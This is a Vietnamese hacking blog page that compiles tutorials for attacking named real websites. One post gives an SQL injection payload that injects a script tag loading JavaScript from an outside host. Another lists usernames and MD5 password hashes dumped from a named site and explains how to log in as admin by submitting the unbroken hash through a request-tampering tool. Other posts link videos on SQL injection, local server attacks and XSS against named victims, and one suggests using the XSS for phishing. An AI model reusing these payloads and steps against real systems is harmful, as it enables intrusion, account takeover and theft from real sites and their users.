Social Icons

Thứ Tư, 3 tháng 4, 2013

[ SQLI ] khai thác SQL với Javascript

[ SQLI ] khai thác SQL với Javascript

Làm bài tut khai thác SQL bằng javascript cho anh em đỡ mỏi tay

file javascript


http://huutai.net/sqli.js
 
các bác tải về để sẵn khi nào dùng , lỡ em nó die

đoạn script
concat((0x3c736372697074207372633d22687474703a2f2f 6875757461692e6e65742f73716c692e6a73223e3c2f736372 6970743e))volcano
concat((0x<script src="http://huutai.net/sqli.js"></script>))volcano
Video TUT

http://www.mediafire.com/?8bzfukajgzmsbc8
Tut by Xiii 
readmore...
Nhãn:

[ SQLI ] Error base

[ SQLI ] Error base

http://www.mediafire.com/?lqp7cmd25g93123

pass: vhb

Tut by: Bạch Cốt Tinh
readmore...
Nhãn:

Cách login khi không decode đc md5 đối với 1 số site

Cách login khi không decode đc md5 đối với 1 số site
================
Tut by Leorius - VHB - Dành cho newbie, miễn gạch đá

1. Chào các bạn, mình mạo muội làm tut login khi không decode được MD5
đối với một số website mã hoá MD5 trước khi post dữ liệu lên server.

Yêu cầu:

+ Victim: http://traanh.vn/
+ Addon Tamper (Firefox) hoặc các addon tương tự

2. Trước tiên là tìm User,Pass:

http://traanh.vn/?frame=product_deta...m%20tbl_user--



1|admin|c2a26024ce725f94d9b9e90f6a618ba3
2|phamvan|48472492c504e777a664efeff27d9fee
Tình hình là thử đối với các site decode MD5 lớn cho chuỗi c2a26024ce725f94d9b9e90f6a618ba3 mà không được.

Thay vì bỏ, thì còn phương án sau.

3. Tìm link admin, thử login với user là admin (get được ở trên) và pass bất kì (123456):

http://traanh.vn/admin/

4. Bạn để ý chuỗi pass bạn nhập ban đầu chỉ 6 ký tự, nhưng sau khi bấm submit thì chuỗi pass dài ra, tư duy một tí đoán là admincp này mã hoá MD5 bằng JavaScript trước khi post lên server xử lý.

Đến đây có lẽ vấn đề đã được giải quyết:

+ Bật tamper lên
+ Login bằng user (đã get được) và pass (123456)
+ Edit giá trị password bằng tamper thành chuỗi md5 không giải mã được (c2a26024ce725f94d9b9e90f6a618ba3)

Video:
 
Video hướng dẫn

Tut by: Leorius
readmore...
Nhãn:

[ SQLI ] Magic convert

Victim: http://nchla.org/

Các pro chắc chắn rất thành thạo phương pháp này rồi. TUT này mình làm cho các bạn newbie ai chưa biết thì tham khảo thôi. Mình newbie, mới tập tành làm TUT nên không tránh khỏi thiếu sót có gì các bạn cứ góp ý để lần sau mình sửa.

Link video nhẹ chỉ có 2Mb thôi: http://www.mediafire.com/?01ob9lso9qpjauz

Pass mediafire và winrar: vhb
readmore...
Nhãn:

[ SQLI ] SQLI site TQ

[ SQLI ] SQLI site TQ

Lang thang trên mạng tình cờ kiếm được em Tàu làm cái tut sqli

Victim: http://hamu.com.cn/
Link tut : http://www.mediafire.com/?mc8171u0p7e7dam
pass: vhb

Hi vọng giúp các bạn newbie hiểu rõ thêm sqli injection

P/s: Đây là tut đầu tay mọi người góp ý kiến thêm nha.

Tut by: S019ua
readmore...
Nhãn:

[ Local Attack ] Video Local SV Win

[ Local Attack ] Video Local SV Win


http://www.mediafire.com/?xbnwn046v6rvy0p


Pass download: XT_VHB

Tut By: X-T
readmore...
Nhãn:

[ XSS ] Tut XSS Mp3.zing.vn


http://www.mediafire.com/?e5kooae23jyyiiz
Pass: vnhack

Demo Online: http://tinyurl.com/8h5wvmm

Tutorial tấn công Cross Site Scripting.

Victim: Mp3.zing.vn

Mô tả: Bypass filter đơn giản + kết hợp event trong HTML để thực thi script.

P/S: qua TUT này có thể phát triển để tấn công phishing hoặc social engineering hacking nếu biết vận dụng.

TUT này đã làm tut ảnh rồi, mà giờ làm lại video cho dể hiểu cách view source bypass filter với vận dụng chút kiến thức HTML căn bản thôi .

Enjoy it.
readmore...
Nhãn: